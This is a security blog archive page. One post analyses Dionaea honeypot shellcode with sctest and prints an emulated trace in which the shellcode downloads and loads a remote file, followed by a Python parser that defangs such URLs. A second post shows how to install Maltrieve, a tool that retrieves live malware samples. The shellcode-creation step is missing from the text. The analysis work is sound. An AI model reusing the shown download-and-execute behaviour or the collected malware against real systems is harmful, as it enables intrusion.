Tag Archives: malware

Dionaea simple analysis

Dionaea exploit analysis

For this analysis, we'll use the python3 bundled with Dionaea:


Running the command above opens a Python console. Enter the code below line by line:

f = open('/tmp/test.bin','wb+')

This produces the test.bin file in the /tmp/ folder.

Now we analyze it with sctest and append the output to another file:

/opt/dionaea/bin/sctest -S -g -v -s 1000000 < /tmp/test.bin >> test.txt

You should see something like this:

root@host:~# cat test.txt
verbose = 1
success offset = 0x00000068
[emu 0x0xac40e0 info ] The following function is a stub instr_sldt_0f00 functions/misc.c:290
Hook me Captain Cook!
userhooks.c:132 user_hook_ExitThread
stepcount 85067
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417116 =>
           = "urlmon";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
     LPCTSTR szURL = 0x00417121 =>
           = "";
     LPCTSTR szFileName = 0x00416fbe =>
           = "x.";
     DWORD dwReserved = 0;
) =  0;
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00416fbe =>
           = "x.";
) = 0x00000000;
void ExitThread (
     DWORD dwExitCode = 0;
) =  0;

As you can see, the malicious URL is hxxp://
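As an added example (not part of the original post, nor of Dionaea or libemu), here is a small Python parser for the sctest call trace shown above: it reads the calls, arguments and return values, pulls the download URL and target file name out of the URLDownloadToFile call, and defangs the URL so it can be pasted into a report. The sample trace and the malware.example.invalid URL in it are constructed.

```python
import re
# Constructed sample in the layout sctest prints (this post's trace with a made-up URL).
SAMPLE_TRACE = """\
success offset = 0x00000068
HMODULE LoadLibraryA (
     LPCTSTR lpFileName = 0x00417116 =>
           = "urlmon";
) = 0x7df20000;
HRESULT URLDownloadToFile (
     LPUNKNOWN pCaller = 0x00000000 =>
     LPCTSTR szURL = 0x00417121 =>
           = "http://malware.example.invalid/x.exe";
     LPCTSTR szFileName = 0x00416fbe =>
           = "x.";
     DWORD dwReserved = 0;
) =  0;
"""
CALL_RE = re.compile(r"^(\w+) (\w+) \($")                # "HRESULT URLDownloadToFile ("
ARG_RE = re.compile(r"^\s+\w+ (\w+) = (\S+?)( =>|;)$")   # "LPCTSTR szURL = 0x00417121 =>"
DEREF_RE = re.compile(r'^\s+= "(.*)";$')                 # '= "urlmon";' (what the pointer holds)
RET_RE = re.compile(r"^\) = +(\S+);$")                   # ") = 0x7df20000;"

def parse_sctest(trace):
    """Turn an sctest call trace into a list of {'name', 'args', 'ret'} dicts."""
    calls, current, last_arg = [], None, None
    for line in trace.splitlines():
        if m := CALL_RE.match(line):
            current, last_arg = {"name": m.group(2), "args": {}, "ret": None}, None
        elif current is None:
            continue                                 # header lines before the first call
        elif m := ARG_RE.match(line):
            last_arg = m.group(1)
            current["args"][last_arg] = m.group(2)   # raw value, possibly a pointer
        elif (m := DEREF_RE.match(line)) and last_arg:
            current["args"][last_arg] = m.group(1)   # replace the pointer with its string
        elif m := RET_RE.match(line):
            current["ret"] = m.group(1)
            calls.append(current)
            current = None
    return calls
def defang(url):
    """Make a URL safe to paste into a report: http -> hxxp, dots in the host bracketed."""
    scheme, sep, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    return scheme.replace("http", "hxxp") + sep + host.replace(".", "[.]") + slash + path
def extract_downloads(trace):
    """(defanged URL, local file name) for every URLDownloadToFile the shellcode issued."""
    return [(defang(c["args"]["szURL"]), c["args"]["szFileName"])
            for c in parse_sctest(trace) if c["name"] == "URLDownloadToFile"]
```

Feed it the contents of test.txt instead of SAMPLE_TRACE to summarise a real sctest run.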

Reference: https://sourceforge.net/p/nepenthes/mailman/message/26862416/

Maltrieve on Mac OS X

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources listed at a number of sites, including:

  • Malc0de
  • Malware Black List
  • Malware Domain List
  • VX Vault
  • URLquery
  • CleanMX

    If you want to install maltrieve on your Mac OS X, below are the steps to install it.

    • First, install beautifulsoup4 via pip:
      sudo pip install beautifulsoup4
    • Install the required dependencies via MacPorts:
      sudo port install libxml2 libxslt py-lxml
    • Clone maltrieve from GitHub and run it:
      sudo git clone https://github.com/technoskald/maltrieve.git
      cd maltrieve
      python maltrieve.py -d pull -l maltrieve.log

    Done. Now you can use Maltrieve on your Mac OS X.